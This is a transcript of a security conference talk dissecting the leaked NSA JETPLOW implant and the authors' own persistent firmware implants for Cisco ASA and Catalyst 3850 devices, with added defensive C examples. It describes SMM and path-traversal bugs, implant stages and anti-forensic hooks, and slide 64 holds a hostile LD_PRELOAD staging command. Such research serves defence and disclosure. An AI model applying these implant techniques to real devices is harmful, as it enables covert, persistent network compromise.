
JETPLOW is dead. Long live the JETPLOW!

Roman Bazhin
January 27, 2017

The documents on NSA software published by Edward Snowden created a stir, but did not show how that software actually worked. That became possible once the Shadow Brokers' leak was published. We were not idle during that period and tried to replicate the work through our own independent research. In this talk we analyze the leaked JETPLOW in depth and compare it against our own results. We also consider how this situation and such backdoors can develop further, and how things stand with other Cisco equipment. In the last part we show methods for detecting such backdoors.


Transcript

  1. Agenda
     • Intro
     • Cisco ASA 5525-X: Internals, Implantation
     • JETPLOW
     • Cisco Catalyst 3850: Internals, Implantation
     • Summary

  3. Cisco ASA 5525-X: Internals / Boot images / Timeline

     | #   | Boot image       | (hex)     | Linux kernel                     | Build timestamp     |
     |-----|------------------|-----------|----------------------------------|---------------------|
     | 1   | asa823-k8        | 0x100000  | 2.6.29.6                         | 2010-08-06 13:51:46 |
     | 2   | asa824-1-k8      | 0x100000  | 2.6.29.6                         | 2010-12-18 00:02:38 |
     | ... |                  |           |                                  |                     |
     | 13  | asa825-smp-k8    | 0x200000  | 2.6.29.6                         | 2011-05-20 23:33:17 |
     | ... |                  |           |                                  |                     |
     | 119 | asa932-2-smp-k8  | 0x1000000 | 3.10.19-WR6.0.0.2_standard       | 2015-01-28 23:27:02 |
     | ... |                  |           |                                  |                     |
     | 122 | asa933-smp-k8    | 0x1000000 | 3.10.19-WR6.0.0.2_standard       | 2015-04-22 16:35:34 |
     | 123 | asa941-1-smp-k8  | 0x1000000 | 3.10.55-ltsi-WR6.0.0.13_standard | 2015-05-05 03:47:13 |
     | ... |                  |           |                                  |                     |
     | 142 | asa962-smp-k8    | 0x1000000 | 3.10.62-ltsi-WR6.0.0.27_standard | 2016-08-24 01:42:33 |

  4. Cisco ASA 5525-X: Internals / Bringing arbitrary code / Custom boot images
     (slides 4 and 5 carry the same text)
     • No signature
     • The image can be reassembled after recalculating the hash
     • The hash is stored in the "BootLdr" header (md5, sha1 or sha512)
     • You can build your own boot image
     • 0x14000 <- ROMMON TFTP Loader
     • 0x100000 <- ROMMON GRUB
     • Easily boot with a Nintendo emulator

  6. Cisco ASA 5525-X: Internals / BIOS Flash Map / BIOS WE
     BIOS Write Enable (BIOSWE)
       0 = Only read cycles result in Firmware Hub I/F cycles.
       1 = Access to the BIOS space is enabled for both read and write cycles. When this bit is written from a 0 to a 1 and BIOS Lock Enable (BLE) is also set, an SMI# is generated. This ensures that only SMI code can update BIOS.
     BIOS Lock Enable (BLE)
       0 = Setting the BIOSWE will not cause SMIs.
       1 = Enables setting the BIOSWE bit to cause SMIs. Once set, this bit can only be cleared by a PLTRST#.
     Source: http://www.intel.com/content/dam/doc/datasheet/io-controller-hub-9-datasheet.pdf

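The two bits quoted above decide who may write the BIOS flash. The following added example, our code rather than anything from the deck, decodes a BIOS_CNTL byte into that verdict and, on Linux, reads the live register from the LPC bridge's PCI configuration space (device 00:1f.0, offset 0xDC on ICH9, per the datasheet the slide cites). The sysfs path and the three-way classification are ours; the register offset and bit positions are Intel's.

```c
/* Added example (ours, not from the deck): decode the ICH9 BIOS_CNTL byte
 * whose BIOSWE and BLE bits the slide quotes, classify the flash's exposure
 * to a ring-0 attacker, and optionally read the live register from Linux
 * sysfs.  Register location (LPC bridge 00:1f.0, config offset 0xDC) and bit
 * positions are from the ICH9 datasheet; the policy verdict is ours. */
#include <stdint.h>
#include <stdio.h>

#define LPC_CONFIG_PATH  "/sys/bus/pci/devices/0000:00:1f.0/config"
#define BIOS_CNTL_OFFSET 0xDC
#define BIOS_CNTL_BIOSWE (1u << 0)   /* BIOS Write Enable */
#define BIOS_CNTL_BLE    (1u << 1)   /* BIOS Lock Enable, sticky until PLTRST# */

enum flash_exposure {
    FLASH_WRITABLE,     /* BIOSWE=1: any ring-0 code can write the flash right now */
    FLASH_UNLOCKED,     /* BIOSWE=0, BLE=0: ring-0 code can set BIOSWE and then write */
    FLASH_SMM_GUARDED   /* BIOSWE=0, BLE=1: setting BIOSWE raises SMI#; only the SMM
                           handler decides whether the write proceeds */
};

enum flash_exposure classify_bios_cntl(uint8_t bios_cntl)
{
    if (bios_cntl & BIOS_CNTL_BIOSWE) return FLASH_WRITABLE;
    if (!(bios_cntl & BIOS_CNTL_BLE))  return FLASH_UNLOCKED;
    return FLASH_SMM_GUARDED;
}

const char *flash_exposure_name(enum flash_exposure e)
{
    switch (e) {
    case FLASH_WRITABLE: return "WRITABLE: BIOSWE set, no SMI needed to flash";
    case FLASH_UNLOCKED: return "UNLOCKED: BLE clear, ring 0 may set BIOSWE freely";
    default:             return "SMM-GUARDED: BLE set, writes go through the SMI handler";
    }
}

/* Read BIOS_CNTL from PCI config space via sysfs (root is needed for offsets
 * >= 0x40).  Returns 0..255 on success, -1 if the register could not be read. */
int read_bios_cntl(const char *config_path)
{
    FILE *f = fopen(config_path, "rb");
    if (!f) return -1;
    int value = -1;
    if (fseek(f, BIOS_CNTL_OFFSET, SEEK_SET) == 0) {
        int c = fgetc(f);
        if (c != EOF) value = c;
    }
    fclose(f);
    return value;
}

int main(void)
{
    int v = read_bios_cntl(LPC_CONFIG_PATH);
    if (v < 0) {
        fprintf(stderr, "cannot read %s (not ICH9/Linux, or not root)\n", LPC_CONFIG_PATH);
        return 1;
    }
    printf("BIOS_CNTL = 0x%02x -> %s\n", v,
           flash_exposure_name(classify_bios_cntl((uint8_t)v)));
    return 0;
}
```

Two caveats. SMM-GUARDED is only as strong as the SMI handler that receives the write request, which is exactly what the SMIFlash slides later in this deck examine; and this decode is ICH9-era, so on later PCHs the SMM_BWP bit of the same register also needs to be read before calling the flash protected.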
  7. Cisco ASA 5525-X: Internals / BIOS Flash Map / UEFITool
     https://github.com/LongSoft/UEFITool

  8. Cisco ASA 5525-X: Implantation / Version 1
     (diagram; slides 8 and 9 are identical) Labels: FirstLdr, SecondLdr, BootLdr, Vmlinuz, Rootfs; ROMMON, GRUB, StubLdr, startup, Vmlinux, do_execve, lina

  10. Cisco ASA 5525-X: Implantation / Version 2
     (diagram built up over slides 10-15, same labels as Version 1) Slide 14 marks the added component "???"; slide 15 reveals it as SMM.

  16. Cisco ASA 5525-X: Implantation / Version 2 / Software SMI# Timer
     Software SMI# Timer Enable (SWSMI_TMR_EN)
       0 = Disable. Clearing the SWSMI_TMR_EN bit before the timer expires will reset the timer and the SMI# will not be generated.
       1 = Starts Software SMI# Timer. When the SWSMI timer expires (the timeout period depends upon the SWSMI_RATE_SEL bit setting), SWSMI_TMR_STS is set and an SMI# is generated. SWSMI_TMR_EN stays set until cleared by software.
     Software SMI# Timer Rate Selector (SWSMI_RATE_SEL)
       00 = 1.5 ms ± 0.6 ms
       01 = 16 ms ± 4 ms
       10 = 32 ms ± 4 ms
       11 = 64 ms ± 4 ms
     Source: http://www.intel.com/content/dam/doc/datasheet/io-controller-hub-9-datasheet.pdf

  17. Cisco ASA 5525-X: Implantation / Version 2 / SMM / SMIFlash
     (slides 17 and 18 show the same decompiled excerpt)

     void __fastcall SMIFlashSMIHandler(void *DispatchHandle, EFI_SMM_SW_DISPATCH_CONTEXT *DispatchContext)
     {
         /* ... */
         SwSmiInputValue    = DispatchContext->SwSmiInputValue;
         CpuSaveStateOffset = 0x2C8 * Cpu;
         /* communication buffer address comes from the caller's saved EBX (low half) and ECX (high half) */
         LowBufferAddress   = *(CpuSaveStateOffset + v9 + offsetof(EFI_SMM_CPU_STATE32, _EBX));
         HighBufferAddress  = Shl64(*(CpuSaveStateOffset + v9 + offsetof(EFI_SMM_CPU_STATE32, _ECX)), 32);
         v14       = (SwSmiInputValue - 0x20);
         pCommBuff = (LowBufferAddress + HighBufferAddress);
         switch (SwSmiInputValue) {
             /* ... */
             case 0x21:
                 ReadFlash(pCommBuff);   /* caller-controlled FUNC_BLOCK, see the next slide */
                 break;
             /* ... */
         }
         /* ... */
     }

  19. Cisco ASA 5525-X: Implantation / Version 2 / SMM / SMIFlash.ReadFlash
     (slides 19-21 show the same listing; slide 20 adds the overflow comment, slide 21 the advisory)

     ; __int64 __fastcall ReadFlash(FUNC_BLOCK *pFuncBlock)
     ReadFlash proc near
         mov     edx, [rcx+FUNC_BLOCK.BlockAddr]
         mov     r8, [rcx+FUNC_BLOCK.BufAddr]
         xor     r9d, r9d
         add     edx, 0FFC00000h          ; Integer Overflow here
         cmp     [rcx+FUNC_BLOCK.BufSize], r9d
         jbe     short loc_4003F3
     loc_4003DD:
         mov     al, [rdx]
         inc     r9
         inc     rdx
         mov     [r8], al
         mov     eax, [rcx+FUNC_BLOCK.BufSize]
         inc     r8
         cmp     r9, rax
         jb      short loc_4003DD
     loc_4003F3:
         mov     [rcx+FUNC_BLOCK.ErrorCode], 0
         xor     eax, eax
         retn
     ReadFlash endp

     Lenovo Security Advisory: LEN-4710
     https://support.lenovo.com/us/en/product_security/len_4710

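The `add edx, 0FFC00000h` on the slide is the bug: BlockAddr is added to the flash base in 32 bits, so a BlockAddr of 0x400000 or more wraps the source pointer below the 4 MiB aperture, and because ReadFlash runs in SMM it copies whatever physical memory that points at, SMRAM included, into the caller's buffer. The following added example, our C model rather than the vendor's firmware, reproduces that logic beside a bounds-checked version. Physical memory is simulated (an aperture whose bytes are a function of offset plus 64 KiB of constructed RAM holding a fake SMRAM secret), and BufAddr is a host pointer here; the real handler must additionally verify that the destination lies outside SMRAM.

```c
/* Added example (ours, not the vendor's code): a C model of the ReadFlash
 * routine on the slide, beside a bounds-checked version.  Physical memory is
 * a constructed model: a 4 MiB flash aperture at 0xFFC00000 whose bytes are a
 * function of the offset, and 64 KiB of "RAM" at physical 0 holding a fake
 * SMRAM secret.  BufAddr is a host pointer here; in the real handler it is a
 * physical address that also needs checking against SMRAM. */
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

#define FLASH_BASE 0xFFC00000u   /* 'add edx, 0FFC00000h' on the slide */
#define FLASH_SIZE 0x00400000u   /* 4 MiB aperture ending at 0xFFFFFFFF */
#define RAM_SIZE   0x10000u      /* constructed */
#define SMRAM_OFF  0x1000u       /* constructed: where the fake secret sits */

static uint8_t ram[RAM_SIZE];

static uint8_t phys_read(uint32_t addr)
{
    if (addr >= FLASH_BASE) return (uint8_t)((addr - FLASH_BASE) * 7u + 1u);
    if (addr < RAM_SIZE)    return ram[addr];
    return 0xFF;
}

typedef struct {
    uint32_t BlockAddr;   /* offset into the flash part, caller-controlled */
    uint8_t *BufAddr;     /* destination, caller-controlled */
    uint32_t BufSize;     /* caller-controlled */
    uint32_t ErrorCode;
} FUNC_BLOCK;

/* Model of the slide: the 32-bit add wraps once BlockAddr >= 0x400000, so the
 * source pointer lands anywhere in the low 4 GiB instead of inside the flash. */
void ReadFlash_vulnerable(FUNC_BLOCK *fb)
{
    uint32_t src = fb->BlockAddr + FLASH_BASE;          /* wraps mod 2^32 */
    for (uint32_t i = 0; i < fb->BufSize; i++)
        fb->BufAddr[i] = phys_read(src + i);            /* runs in SMM: SMRAM is readable */
    fb->ErrorCode = 0;
}

/* Our fix: the whole request must lie inside the aperture.  The length check
 * is written as a subtraction so it cannot overflow either. */
int ReadFlash_fixed(FUNC_BLOCK *fb)
{
    if (fb->BlockAddr >= FLASH_SIZE || fb->BufSize > FLASH_SIZE - fb->BlockAddr) {
        fb->ErrorCode = 1;
        return -1;
    }
    uint32_t src = FLASH_BASE + fb->BlockAddr;
    for (uint32_t i = 0; i < fb->BufSize; i++)
        fb->BufAddr[i] = phys_read(src + i);
    fb->ErrorCode = 0;
    return 0;
}

/* Attacker-shaped request: BlockAddr = 0x400000 + SMRAM_OFF wraps to physical SMRAM_OFF. */
bool vulnerable_leaks_secret(void)
{
    memcpy(ram + SMRAM_OFF, "SMRAM-SECRET", 12);
    uint8_t out[12] = {0};
    FUNC_BLOCK fb = { FLASH_SIZE + SMRAM_OFF, out, sizeof out, 0xFF };
    ReadFlash_vulnerable(&fb);
    return fb.ErrorCode == 0 && memcmp(out, "SMRAM-SECRET", 12) == 0;
}

bool fixed_rejects_wrapped_request(void)
{
    uint8_t out[12] = {0};
    FUNC_BLOCK fb = { FLASH_SIZE + SMRAM_OFF, out, sizeof out, 0 };
    return ReadFlash_fixed(&fb) == -1 && fb.ErrorCode == 1 && out[0] == 0;
}

bool fixed_still_reads_flash(void)
{
    uint8_t out[4] = {0};
    FUNC_BLOCK fb = { 0x10, out, sizeof out, 0 };
    return ReadFlash_fixed(&fb) == 0
        && out[0] == phys_read(FLASH_BASE + 0x10)
        && out[3] == phys_read(FLASH_BASE + 0x13);
}

int main(void)
{
    printf("vulnerable leaks fake SMRAM:   %s\n", vulnerable_leaks_secret() ? "yes" : "no");
    printf("fixed rejects wrapped request: %s\n", fixed_rejects_wrapped_request() ? "yes" : "no");
    printf("fixed reads real flash offset: %s\n", fixed_still_reads_flash() ? "yes" : "no");
    return 0;
}
```

The same confused-deputy shape applies to the write direction: a handler that takes source, destination and length from a ring-0 caller and runs in SMM has to range-check all three against both the flash aperture and SMRAM, not just one of them.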
  22. Cisco ASA 5525-X: Implantation / Version 2 / Stages
     Stage 1: Relocate from BIOS Flash to RAM
     Stage 2: Relocate from RAM to SMRAM
     Stage 3: Decrypt next stages
     Stage 4: Wipe used stages from RAM to hide the traces; SMM timer; check StubLdr; extract Vmlinuz; parse ELF and collect symbols; wait for kernel; allocate dropper; splice function `open_exec`
     Stage 5: Dropper
     Stage 6: Shim
     Stage 7: Payload

  23. Cisco ASA 5525-X: Implantation / Version 2 / Infection
     • Boot with custom evil image (local, remote, etc.)*
     • Examine platform configuration
     • Pass collected info back to the attacker, e.g. via an SSH connection
     • Build stages
     • Infect
     • Cleanup
     • Reload the platform
     * PIC

  24. Cisco ASA 5525-X: Implantation / Version 2 / Cruise control
     (timeline diagram built up over slides 24-37; horizontal axis t, rows SMM and R/P/L) Labels in order of appearance: ROMMON, GRUB, Stage 2, Stage 3, Stage 4, BootLdr, StubLdr, extracted copy of Linux kernel, Linux kernel, Stage 5, Stage 6, Stage 7, /asa/bin/lina

  38. JETPLOW: The NSA Implant / Limitations of the research
     • BannanaDaiquiri 3.1.2* (BG3121)
     • ScreamingPlow 2.8 (SCP28)
     • Cisco ASA 5505 with ROMMON v. 10.0(12)13
     • Boot image v. 8.3.1 (asa831-k8)
     • Custom evil engineering boot image

  39. JETPLOW: The NSA Implant / Infection
     • Assemble Keyed Flash Image for target
       • The image must be generated specifically for a target firewall with reference to some basic information about it (series, ROMMON version, etc.)
     • Load Keyed Flash Image and wait for remote connection
     • Customize the implant and start the infection process
     • Send implant to target
     • Install implant
     • Cleanup
     • Reload the platform

  40. JETPLOW: The NSA Implant / Configuring / “my hovercraft is full of eels”
     Part of decrypted “asa5505_101213_install_SCP28.pif”:

     <patch>
       <data src="inline" type="userarea">0</data>   <!-- Assigned later -->
       <address>fff70000</address>                    <!-- SECOND_USER_AREA_ADDRESS -->
     </patch>
     <patch>
       <data src="file">bin/asa5505/SCP28/asa5505_patch60000.bin</data>
       <address>fff60000</address>                    <!-- FIRST_CODE_AREA_ADDRESS -->
     </patch>
     <patch>
       <data src="inline" type="pbd">0</data>         <!-- Assigned later -->
       <address>fff6df00</address>                    <!-- FIRST_USER_AREA_ADDRESS -->
     </patch>
     <patch>
       <data src="file">bin/asa5505/SCP28/asa5505_patchEC480.bin</data>
       <address>fffec480</address>                    <!-- SECOND_CODE_AREA_ADDRESS -->
     </patch>
     <patch>
       <data src="file">bin/asa5505/SCP28/asa5505_patchE18BF.bin</data>
       <address>fffe18bf</address>                    <!-- HOOK_ADDRESS -->
     </patch>

  41. JETPLOW: The NSA Implant
     Part of “40086100.dat” (the slide lays these out in two columns; listed here in reading order):

     ; --- SECTION I ---
     allocb              0x008d6e94
     rand                0x00b978c0
     freeb               0x008d7280
     process_create      0x0010dbec
     open                0x00110368
     process_suspend     0x0010ea9c
     ip_put              0x0047f670
     process_sleep_for   0x0010f4e0
     close               0x0011046c
     show_process        0x006f8ab0
     atoip               0x00b8d928
     cur_t               0x00db4510
     memset              0x00b7b1d8
     calc_ip_cksum       0x00482ea4
     memmove             0x00b97a6c
     arp_loopkup         0x00484664
     malloc_call_calloc  0x008d6b70
     send_it             0x00481604
     free                0x00b8319c
     arp_create          0x00486784
     printf              0x0010fc70
     get_hw_iface_2      0x0074148c
     ...

  42. JETPLOW: The NSA Implant
     Part of “40086100.dat”:

     ; --- SECTION II ---
     HookLocation             0x005f6425
     FlashClassAddr           0x00000000
     JmpLocation              0x005f90a6
     CryptoDeviceAddr         0x00db7fd0
     InterfaceAddr            0x00c866ac
     ArpTableAddrPtr          0x00c793a8
     InterfaceLeng            0x000001b8
     ArpTableLastPtr          0x00c793b0
     IntSecurityOffset        0x1c
     NumInterfaces            0x00000000
     IntNameOffset            0x188
     IfaceStruct2             0x00000000
     IntNumOffset             0x143
     FlashFileInfoSizeOffset  0x00000018
     IntVlanOffset            0x10
     PIXFlashRmfileAddress    0x0035c30c
     IntIPOffset              0x20
     FlashDirlistAddress      0x003e7b1c
     IntNetmaskOffset         0x24
     FlashChmodAddress        0x003e7c40
     ...

  43. Cisco ASA 5525-X: Implantation / Version 2 / Causes of SMI#
     (diagram) Source: http://opensecuritytraining.info/IntroBIOS_files/Day1_07_Advanced x86 - BIOS and SMM Internals - SMM.pdf

  44. JETPLOW: The NSA Implant / Conclusion
     (slide 45 repeats this slide and adds the feedback line)
     • After reversing JETPLOW, we can note that:
       • the authors have done an awesome job;
       • the implant supports a wide range of hardware (PIX 701 – ASA 5505);
       • the latest versions have a well thought-out architecture;
       • an industrial approach.
     • Further reading:
       • https://dsec.ru/ipm-research-center/research/architecture_jetplow/
     • JETPLOW feedback:
       • E-mail: [email protected]. Phone Number: +1-301-688-6524

  46. Cisco ASA 5525-X: Anti-forensic / “Check the logs on the ASA firewall”
     • BIOS Stealth
       • Hook BIOS R/W code (SMIFlash)
       • Use Flash SPI SMI# Enable (FSMIE)* to hook HW/SW sequencing access to BIOS Flash
       • Anti ROMMON upgrade
     • FS Stealth
       • Hook `filp_open` and `filp_write` in kernel mode
       • Hook `open`, `fopen`, `access`, `stat` etc. in user space
     • …

  47. Cisco ASA 5525-X: Conclusion / It's not a bug, it's an undocumented feature
     • Potentially implantation may be subject to: ASA 5505, ASA 5510, ASA 5512-X, ASA 5515-X, ASA 5520, ASA 5540, ASA 5545-X, ASA 5550, ASA 5555-X, ASA 5580, ASA 5585-X
     • Cisco official position:
       > This list of ASA hardware models provided do not support secure boot or hardware-based attestation of a digitally signed image.
       > Your scenario where a custom image could be booted and made persistent might be possible on the ASA hardware platforms which do not support secure boot or hardware-based attestation.

  48. Cisco 3850: Internals / Booting
     (diagram) Labels: RESET, ROMMON, FBL, SBL, Linux Kernel, main process /usr/binos/bin/iosd; NOR Flash, boot image on NAND Flash (boot:); addresses 0xBFC00000, 0xBFC01000, 0x80030000, 0x80100000

  49. Cisco 3850: Internals / Booting
     First Boot Loader (FBL):
       1. RESET: j start
       2. init_boot_bus(), init_i2c_bus(), init_dram(), etc.
       3. sw 0x0800C180, which translates to `j sbl_entry` @ 0x80030000
       4. memcpy(sbl_entry + 4, sbl_text, …)
       5. j sbl_entry
     Second Boot Loader (SBL):
       6. expand_bundle(), verify_nova_pkg(), …
       7. launch_kernel()

  50. Cisco 3850: Internals / Boot images (slide 52 reuses the figure under Internals / Bringing arbitrary code / Custom boot images)
     (format diagram built up over slides 50-52) Bundle (.bin): Header, TLVs, Signature, Packages. Package: Header, TLVs, Signature, Files. TLV: Type, Length, Value. File entry: Offset, Length, Mode, Name. Package TLV Types 22-25; slide 51 adds the labels Linux kernel and Parts of file system.

  53. Cisco 3850: Internals / Bringing arbitrary code / Custom boot images
     (slides 53-56 show the same excerpt; slide 55 annotates pkgname, slide 56 adds the advisory)

     // /usr/bin/unbundle
     // ...
     snprintf(&fullpath, "%s/%s", tmpdir, pkgname);   // pkgname comes from the bundle, e.g. ../../usr/bin/FILE
     fd = fopen(fullpath, "wb");
     fwrite(fd, 1, pkgsize, pkgdata);
     fclose(fd);
     chmod(fullpath, pkgaccess);
     // ...

     Cisco Security Advisory: cisco-sa-20161115-iosxe
     https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161115-iosxe

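The traversal annotated on slide 55 exists because pkgname, read from the bundle, is trusted verbatim in the `%s/%s` join. The following added example, our code and not Cisco's unbundle, shows that join beside a version that rejects any name which would leave tmpdir: absolute names, backslashes, and any sequence of components whose `..` steps climb above the starting directory. The directory and package names are constructed.

```c
/* Added example (ours, not Cisco's code): the path join the slide shows,
 * which trusts pkgname from the bundle, beside a version that rejects any
 * name that would leave tmpdir.  The rule is lexical: walk the components,
 * let ".." pop one level, and fail if the depth ever goes negative or the
 * name is absolute.  Sample names below are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define TMPDIR "/tmp/unbundle"   /* constructed extraction directory */

/* The slide's pattern: whatever is in pkgname ends up in the path. */
int join_unchecked(char *out, size_t outlen, const char *tmpdir, const char *pkgname)
{
    int n = snprintf(out, outlen, "%s/%s", tmpdir, pkgname);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* True if the relative path ever climbs above its starting directory. */
bool path_escapes(const char *rel)
{
    int depth = 0;
    const char *p = rel;
    while (*p) {
        const char *q = strchr(p, '/');
        size_t len = q ? (size_t)(q - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0) return true;           /* ".." past tmpdir */
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            depth++;                                /* ordinary component */
        }
        if (!q) break;
        p = q + 1;
    }
    return false;
}

/* Hardened join: no empty or absolute names, no backslashes, no escaping "..". */
int join_checked(char *out, size_t outlen, const char *tmpdir, const char *pkgname)
{
    if (!pkgname || !*pkgname || pkgname[0] == '/' || strchr(pkgname, '\\'))
        return -1;
    if (path_escapes(pkgname))
        return -1;
    return join_unchecked(out, outlen, tmpdir, pkgname);
}

/* Convenience wrappers so the two behaviours can be compared on one name. */
bool unchecked_join_ok(const char *pkgname)
{
    char path[256];
    return join_unchecked(path, sizeof path, TMPDIR, pkgname) == 0;
}

bool checked_join_ok(const char *pkgname)
{
    char path[256];
    return join_checked(path, sizeof path, TMPDIR, pkgname) == 0;
}

int main(void)
{
    const char *names[] = { "pkg.bin", "sub/../pkg.bin", "../../usr/bin/FILE", "/etc/passwd" };
    char path[256];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int u = join_unchecked(path, sizeof path, TMPDIR, names[i]);
        printf("%-20s unchecked -> %s\n", names[i], u == 0 ? path : "(error)");
        int c = join_checked(path, sizeof path, TMPDIR, names[i]);
        printf("%-20s checked   -> %s\n", names[i], c == 0 ? path : "REJECTED");
    }
    return 0;
}
```

A lexical check like this says nothing about symlinks that already exist inside tmpdir, so the extractor should also create files relative to a directory descriptor with `openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, mode)` and use a tmpdir that only the extractor can write.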
  57. Cisco 3850: Implantation / Infection
     Switch# request system shell
     Are you sure you want to continue? [y/n] y
     Challenge: c804288d2b32cef958a77...skip...465f633d51aeb4702daf7166b
     Please enter the shell access response based on the above challenge
     (Press "Enter" when done or to quit.):

     (slides 57-59 repeat this prompt; slide 58 points at /usr/bin/code_sign_verify_nova_pkg and slide 59 shows it replaced by /bin/true)

  60. Cisco 3850: Internals / Bringing arbitrary code / Jailbreak
     Switch> en
     Switch# software expand file flash/:CVE-2016-6450.bin
     Preparing expand operation ...
     [1]: Expanding bundle usbflash0:CVE-2016-6450.bin
     [1]: Copying package files
     [1]: Package files copied
     [1]: Finished expanding bundle usbflash0:CVE-2016-6450.bin
     Switch# conf t
     Switch(config)# service internal
     Switch(config)# end
     ...

  61. Cisco 3850: Internals / Bringing arbitrary code / Jailbreak
     ...
     Switch# request system shell
     Are you sure you want to continue? [y/n] y
     Challenge: c804288d2b32cef958a5a47377...skip...465f633d51aeb4702daf7166b
     Please enter the shell access response based on the above challenge
     (Press "Enter" when done or to quit.):
     SUPER-SECRET-ENGINEERING-PASSWORD
     **********************************************************************
     Activity within this shell can jeopardize the functioning of the system.
     Use this functionality only under supervision of Cisco Support.
     Logging to media is disabled since the media device bootflash: is not available.
     **********************************************************************
     Terminal type 'network' unknown. Assuming vt100
     [linux:/]$ uname -a
     Linux linux 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux

  62. Cisco 3850: Implantation / Infection
     • Jailbreak (local, remote, etc.)*
     • Examine platform configuration
     • Pass collected info back to the attacker, e.g. via an SSH connection
     • Build stages
     • Infect
     • Cleanup
     • Reload the platform
     * PIC

  63. Cisco 3850: Implantation / Infection
     1. Patch the stored jump word
          Original:  sw 0x800C180   ->  j sbl_start
          Patched:   sw 0x8000004   ->  j s1_entry      ; s1_entry @ 0xBFC14BF4
                     nop                nop
                     ...                ...
     2. Store the Stage 1 code just below the `j sbl_start` instruction
     3. Store the rest of the implant in the free space at the end of the BS

  64. Cisco 3850: Implantation / Cruise control
     • Stage 1
       • Relocate Stage 2 code to RAM @ 0x80000000
       • Splice launch_kernel() to take over control when the kernel code has been allocated
     • Stage 2
       • Splice init_post() to take over control just before the kernel is ready to execute /sbin/init
     • Stage 3
       • Use kmem_cache_alloc() to allocate memory for Stages 4 – 5
       • Call kernel_thread() with the threading procedure set to the Stage 4 code
     • Stage 4
       • Call kernel_execve() to move the thread from kernel space to user space and run /bin/bash (which is Stage 5)
     • Stage 5
       • bash -c eval “dd if=/dev/mtd0 of=/tmp/evil.so … && export LD_PRELOAD=/tmp/evil.so”

  65. Cisco 3850: Anti-forensic
     • Anti-update
       • Hook `mtd_read` and `mtd_write`
     • Anti-logging
       • Hook `filp_open` and `filp_write`
     • …

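Slide 46 (user-space hooks on `open`, `fopen`, `access`, `stat`) and slide 64 (Stage 5 exporting LD_PRELOAD=/tmp/evil.so) describe hiding done inside libc's view of the filesystem. The following added example, ours and not part of the deck, is one detection check aimed at exactly that layer: it lists a directory once through libc and once through raw openat/getdents64 syscalls, and reports entries the kernel returns but libc does not. It is Linux-specific, the directory names are arbitrary, and the kernel-side hooks on this slide and slide 46 (`filp_open`, `mtd_read`) are invisible to it; those need an out-of-band comparison, for example against a flash dump taken with the device powered off.

```c
/* Added example (ours, not from the deck): detect user-space hiding of the
 * kind an LD_PRELOAD stage performs by comparing two views of the same
 * directory, one through libc (opendir/readdir, hookable from a preloaded
 * library) and one through raw getdents64 syscalls, which bypass libc.
 * Linux-only.  Kernel-side hooks are not visible to this check. */
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

#define MAX_ENTRIES  2048
#define NAME_MAX_LEN 256

struct linux_dirent64 {           /* kernel ABI record returned by getdents64 */
    uint64_t       d_ino;
    int64_t        d_off;
    unsigned short d_reclen;
    unsigned char  d_type;
    char           d_name[];
};

/* Directory listing via raw syscalls only: openat, getdents64, close. */
static int list_via_syscalls(const char *dir, char names[][NAME_MAX_LEN], int max)
{
    long fd = syscall(SYS_openat, AT_FDCWD, dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (fd < 0) return -1;
    char buf[8192];
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;
        for (long off = 0; off < nread;) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
            if (n < max) {
                strncpy(names[n], d->d_name, NAME_MAX_LEN - 1);
                names[n][NAME_MAX_LEN - 1] = '\0';
                n++;
            }
            off += d->d_reclen;
        }
    }
    syscall(SYS_close, fd);
    return n;
}

/* The same listing through libc, the layer an LD_PRELOAD hook can filter. */
static int list_via_libc(const char *dir, char names[][NAME_MAX_LEN], int max)
{
    DIR *d = opendir(dir);
    if (!d) return -1;
    int n = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (n < max) {
            strncpy(names[n], e->d_name, NAME_MAX_LEN - 1);
            names[n][NAME_MAX_LEN - 1] = '\0';
            n++;
        }
    }
    closedir(d);
    return n;
}

/* Entries the kernel reports but libc does not.  > 0 means something in user
 * space is filtering the view; -1 means the directory could not be read. */
int count_hidden_entries(const char *dir)
{
    static char raw[MAX_ENTRIES][NAME_MAX_LEN], lib[MAX_ENTRIES][NAME_MAX_LEN];
    int nraw = list_via_syscalls(dir, raw, MAX_ENTRIES);
    int nlib = list_via_libc(dir, lib, MAX_ENTRIES);
    if (nraw < 0 || nlib < 0) return -1;
    int hidden = 0;
    for (int i = 0; i < nraw; i++) {
        int found = 0;
        for (int j = 0; j < nlib && !found; j++)
            found = strcmp(raw[i], lib[j]) == 0;
        if (!found) {
            hidden++;
            printf("hidden from libc: %s/%s\n", dir, raw[i]);
        }
    }
    return hidden;
}

int main(int argc, char **argv)
{
    const char *dir = argc > 1 ? argv[1] : "/tmp";
    int h = count_hidden_entries(dir);
    if (h < 0) { perror(dir); return 2; }
    printf("%s: %d entr%s hidden from libc\n", dir, h, h == 1 ? "y" : "ies");
    return h > 0;
}
```

Run it against the directories an implant would use for its staging files (the deck's Stage 5 writes to /tmp). The check is only as independent as `syscall(2)` itself, so a hook that also wraps that symbol defeats it; a statically linked copy of the tool carried onto the box removes that dependency.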
  66. Cisco 3850: Conclusion
     • Potentially implantation may be subject to: Cisco 3850, Cisco 5700 Series Wireless LAN Controllers, Cisco Catalyst 4500E Series Switches, Cisco Catalyst 4500X Series Switches, Cisco Catalyst 3650 Series Switches
     • Cisco official position:
       > CVE-2016-6450
       > Cisco IOS XE Software Directory Traversal Vulnerability
       > CVSS Score: Base 1.5, Temporal 1.2
     • Little bit evil (up to 7.5)
